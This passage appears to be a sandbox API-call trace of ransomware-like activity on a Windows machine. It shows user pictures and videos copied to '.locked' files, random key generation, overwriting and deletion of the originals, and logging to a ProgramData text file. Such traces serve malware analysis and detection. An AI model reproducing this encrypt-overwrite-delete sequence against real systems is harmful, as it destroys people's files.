(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\6FI0Bk.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\6fi0bk.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0315.129] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0315.129] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc0e0 | out: pbBuffer=0x125fc0e0) returned 1 [0315.129] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0a0 | out: pbBuffer=0x1234e0a0) returned 1 [0315.129] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702581 | out: pbBuffer=0x12702581) returned 1 [0315.130] WriteFile (in: hFile=0x230, lpBuffer=0x12722000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x12722000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0315.133] SetEvent (hEvent=0x220) returned 1 [0315.133] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.139] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.315] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0315.344] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.365] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.370] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.376] SetEvent (hEvent=0x20c) returned 1 [0315.376] SetEvent (hEvent=0x14c) returned 1 [0315.376] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.411] SetEvent (hEvent=0x214) returned 1 [0315.411] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.439] SetEvent (hEvent=0x214) returned 1 [0315.439] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e0c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x1263e0c0*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0315.473] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.601] SetEvent (hEvent=0x1f0) returned 1 [0315.601] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.602] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.639] SetEvent (hEvent=0x1f0) returned 1 [0315.639] WriteFile (in: hFile=0x224, lpBuffer=0x17f22000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1235fe78, lpOverlapped=0x0 | out: lpBuffer=0x17f22000*, lpNumberOfBytesWritten=0x1235fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.674] CloseHandle (hObject=0x224) returned 1 [0315.675] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\znhvxq7a7nR.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\znhvxq7a7nr.gif")) returned 1 [0315.684] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.692] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.719] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0315.719] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125dfe94 | out: lpMode=0x125dfe94) returned 0 [0315.721] ReadFile (in: hFile=0x224, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125dbd68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x125dbd68*=0x8d80, lpOverlapped=0x0) returned 1 [0315.723] WriteFile (in: hFile=0x230, lpBuffer=0x142d6000*, nNumberOfBytesToWrite=0x8d80, lpNumberOfBytesWritten=0x125dbd74, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesWritten=0x125dbd74*=0x8d80, lpOverlapped=0x0) returned 1 [0315.797] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.866] ReadFile (in: hFile=0x224, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125dbd68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x125dbd68*=0x0, lpOverlapped=0x0) returned 1 [0315.867] CloseHandle (hObject=0x230) returned 1 [0315.892] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.941] CloseHandle (hObject=0x224) returned 1 [0315.941] SetEvent (hEvent=0x1e8) returned 1 [0315.942] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.952] SetEvent (hEvent=0x214) returned 1 [0315.952] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.961] SetEvent (hEvent=0x1f0) returned 1 [0315.961] SetEvent (hEvent=0x20c) returned 1 [0315.964] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.028] SetEvent (hEvent=0x20c) returned 1 [0316.029] SetEvent (hEvent=0x220) returned 1 [0316.029] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.034] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.063] SetEvent (hEvent=0x198) returned 1 [0316.063] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.234] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.332] SetEvent (hEvent=0x1ac) returned 1 [0316.332] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0316.376] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.376] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0316.384] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.384] SetEvent (hEvent=0x1dc) returned 1 [0316.384] SetEvent (hEvent=0x198) returned 1 [0316.384] SetEvent (hEvent=0x1b8) returned 1 [0316.385] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.397] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0316.397] SetEvent (hEvent=0x150) returned 1 [0316.397] SetEvent (hEvent=0x1b8) returned 1 [0316.397] SetEvent (hEvent=0x198) returned 1 [0316.397] SetEvent (hEvent=0x220) returned 1 [0316.397] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.513] SetEvent (hEvent=0x214) returned 1 [0316.513] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.976] SetEvent (hEvent=0x214) returned 1 [0316.976] SetEvent (hEvent=0x134) returned 1 [0316.976] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.983] SetEvent (hEvent=0x214) returned 1 [0316.983] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0316.985] SetEvent (hEvent=0x1f0) returned 1 [0316.985] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.004] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.013] SetEvent (hEvent=0x134) returned 1 [0317.013] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0317.054] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.054] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0317.059] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.059] SetEvent (hEvent=0x220) returned 1 [0317.059] SetEvent (hEvent=0x134) returned 1 [0317.059] SetEvent (hEvent=0x20c) returned 1 [0317.059] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.085] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0317.085] SetEvent (hEvent=0x150) returned 1 [0317.085] SetEvent (hEvent=0x20c) returned 1 [0317.085] SetEvent (hEvent=0x134) returned 1 [0317.129] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\jLkeKBBsG2Mfojro.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jlkekbbsg2mfojro.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0317.134] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12632e88 | out: lpMode=0x12632e88) returned 0 [0317.134] WriteFile (in: hFile=0x1a4, lpBuffer=0x18006000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12632e78, lpOverlapped=0x0 | out: lpBuffer=0x18006000*, lpNumberOfBytesWritten=0x12632e78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.161] CloseHandle (hObject=0x1a4) returned 1 [0317.161] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\jLkeKBBsG2Mfojro.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jlkekbbsg2mfojro.bmp")) returned 1 [0317.171] ReadFile (in: hFile=0x1e0, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1248dd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1248dd68*=0x15b32, lpOverlapped=0x0) returned 1 [0317.176] WriteFile (in: hFile=0x208, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0x15b32, lpNumberOfBytesWritten=0x1248dd74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x1248dd74*=0x15b32, lpOverlapped=0x0) returned 1 [0317.183] ReadFile (in: hFile=0x1e0, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1248dd68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x1248dd68*=0x0, lpOverlapped=0x0) returned 1 [0317.183] CloseHandle (hObject=0x208) returned 1 [0317.194] CloseHandle (hObject=0x1e0) returned 1 [0317.194] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0317.194] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1248de94 | out: lpMode=0x1248de94) returned 0 [0317.194] WriteFile (in: hFile=0x1e0, lpBuffer=0x1234a380*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x1248de64, lpOverlapped=0x0 | out: lpBuffer=0x1234a380*, lpNumberOfBytesWritten=0x1248de64*=0x3a, lpOverlapped=0x0) returned 1 [0317.194] CloseHandle (hObject=0x1e0) returned 1 [0317.195] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\MbZcvQXWXnb3nn6YXYz.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\mbzcvqxwxnb3nn6yxyz.mkv")) returned 1 [0317.400] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.543] SetEvent (hEvent=0x1ac) returned 1 [0317.543] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.550] SetEvent (hEvent=0x20c) returned 1 [0317.550] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.553] SetEvent (hEvent=0x214) returned 1 [0317.553] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.596] SetEvent (hEvent=0x1f0) returned 1 [0317.597] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.598] SetEvent (hEvent=0x214) returned 1 [0317.598] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.610] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.615] SetEvent (hEvent=0x20c) returned 1 [0317.615] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0317.617] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.617] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0317.618] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.618] SetEvent (hEvent=0x220) returned 1 [0317.618] SetEvent (hEvent=0x1f0) returned 1 [0317.618] SetEvent (hEvent=0x1e8) returned 1 [0317.618] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0317.619] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0317.619] SetEvent (hEvent=0x1f0) returned 1 [0317.619] SetEvent (hEvent=0x1e8) returned 1 [0317.619] SetEvent (hEvent=0x220) returned 1 [0317.619] WriteFile (in: hFile=0x218, lpBuffer=0x13e14000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12659e78, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesWritten=0x12659e78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.642] CloseHandle (hObject=0x218) returned 1 [0317.643] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\1rfU.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1rfu.mkv")) returned 1 [0317.650] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0317.650] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8080 | out: pbBuffer=0x124a8080) returned 1 [0317.650] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0317.650] WriteFile (in: hFile=0x230, lpBuffer=0x126bd000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x126bd000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0317.653] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0317.654] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0317.654] SetEvent (hEvent=0x150) returned 1 [0317.654] SetEvent (hEvent=0x1e8) returned 1 [0317.654] SetEvent (hEvent=0x14c) returned 1 [0317.654] SetEvent (hEvent=0x12c) returned 1 [0317.654] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e7d68*=0xb3e5, lpOverlapped=0x0) returned 1 [0317.656] WriteFile (in: hFile=0x230, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xb3e5, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e7d74*=0xb3e5, lpOverlapped=0x0) returned 1 [0317.719] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.185] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0318.185] CloseHandle (hObject=0x230) returned 1 [0318.185] CloseHandle (hObject=0x19c) returned 1 [0318.185] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0318.186] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0318.186] WriteFile (in: hFile=0x19c, lpBuffer=0x126700c0*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x126700c0*, lpNumberOfBytesWritten=0x125e7e64*=0x38, lpOverlapped=0x0) returned 1 [0318.186] CloseHandle (hObject=0x19c) returned 1 [0318.186] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PtKr-jmS0E4rPaGC6.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ptkr-jms0e4rpagc6.swf")) returned 1 [0318.220] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0318.248] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0318.248] SetEvent (hEvent=0x150) returned 1 [0318.248] SetEvent (hEvent=0x198) returned 1 [0318.248] SetEvent (hEvent=0x214) returned 1 [0318.248] SetEvent (hEvent=0x1b8) returned 1 [0318.249] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PtKr-jmS0E4rPaGC6.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ptkr-jms0e4rpagc6.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0318.505] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0318.505] WriteFile (in: hFile=0x1e0, lpBuffer=0x138ac000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x138ac000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.528] CloseHandle (hObject=0x1e0) returned 1 [0318.534] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PtKr-jmS0E4rPaGC6.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\ptkr-jms0e4rpagc6.swf")) returned 1 [0318.538] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0318.540] SetEvent (hEvent=0x1dc) returned 1 [0318.540] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\a55N4D.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\a55n4d.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0318.541] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0318.541] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\a55N4D.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\a55n4d.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0318.681] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.741] SetEvent (hEvent=0x180) returned 1 [0318.741] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0318.741] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.896] SetEvent (hEvent=0x1e8) returned 1 [0318.896] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.898] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.928] SetEvent (hEvent=0x180) returned 1 [0318.928] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.960] SetEvent (hEvent=0x20c) returned 1 [0318.960] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0318.999] SetEvent (hEvent=0x184) returned 1 [0318.999] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.247] SetEvent (hEvent=0x12c) returned 1 [0319.247] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.253] SetEvent (hEvent=0x1dc) returned 1 [0319.253] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.420] SetEvent (hEvent=0x1ac) returned 1 [0319.420] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.479] SetEvent (hEvent=0x1e8) returned 1 [0319.479] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.627] SetEvent (hEvent=0x1f0) returned 1 [0319.627] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.736] SetEvent (hEvent=0x1f0) returned 1 [0319.741] VirtualAlloc (lpAddress=0x19bf0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x19bf0000 [0319.745] VirtualAlloc (lpAddress=0x10970000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10970000 [0319.772] VirtualAlloc (lpAddress=0x19cf0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x19cf0000 [0319.776] VirtualAlloc (lpAddress=0x10960000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10960000 [0319.796] VirtualAlloc (lpAddress=0x19df0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x19df0000 [0319.801] VirtualAlloc (lpAddress=0x10950000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10950000 [0319.811] VirtualAlloc (lpAddress=0x19ef0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x19ef0000 [0319.815] VirtualAlloc (lpAddress=0x10940000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10940000 [0319.827] VirtualAlloc (lpAddress=0x19ff0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x19ff0000 [0319.831] VirtualAlloc (lpAddress=0x10930000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10930000 [0319.831] VirtualAlloc (lpAddress=0x2174000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2174000 [0319.849] VirtualAlloc (lpAddress=0x1a0f0000, dwSize=0x130000, flAllocationType=0x1000, flProtect=0x4) returned 0x1a0f0000 [0319.852] VirtualAlloc (lpAddress=0x1091e000, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x1091e000 [0319.857] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.858] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0319.860] SetEvent (hEvent=0x220) returned 1 [0319.875] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\X12qhHpa.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\x12qhhpa.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0320.437] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.486] SetEvent (hEvent=0x1dc) returned 1 [0320.486] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125dbe88 | out: lpMode=0x125dbe88) returned 0 [0320.486] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.496] SetEvent (hEvent=0x1dc) returned 1 [0320.496] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.496] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.508] SetEvent (hEvent=0x1ac) returned 1 [0320.508] SetEvent (hEvent=0x184) returned 1 [0320.508] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.513] SetEvent (hEvent=0x22c) returned 1 [0320.513] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.540] SetEvent (hEvent=0x12c) returned 1 [0320.540] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.569] SetEvent (hEvent=0x14c) returned 1 [0320.569] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.616] SetEvent (hEvent=0x184) returned 1 [0320.616] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0320.625] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.625] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0320.638] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.638] SetEvent (hEvent=0x12c) returned 1 [0320.638] SetEvent (hEvent=0x220) returned 1 [0320.638] SetEvent (hEvent=0x22c) returned 1 [0320.638] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0320.645] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0320.645] SetEvent (hEvent=0x150) returned 1 [0320.645] SetEvent (hEvent=0x220) returned 1 [0320.645] SetEvent (hEvent=0x22c) returned 1 [0320.645] SetEvent (hEvent=0x12c) returned 1 [0320.645] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\l1TF3hoXns.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\l1tf3hoxns.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 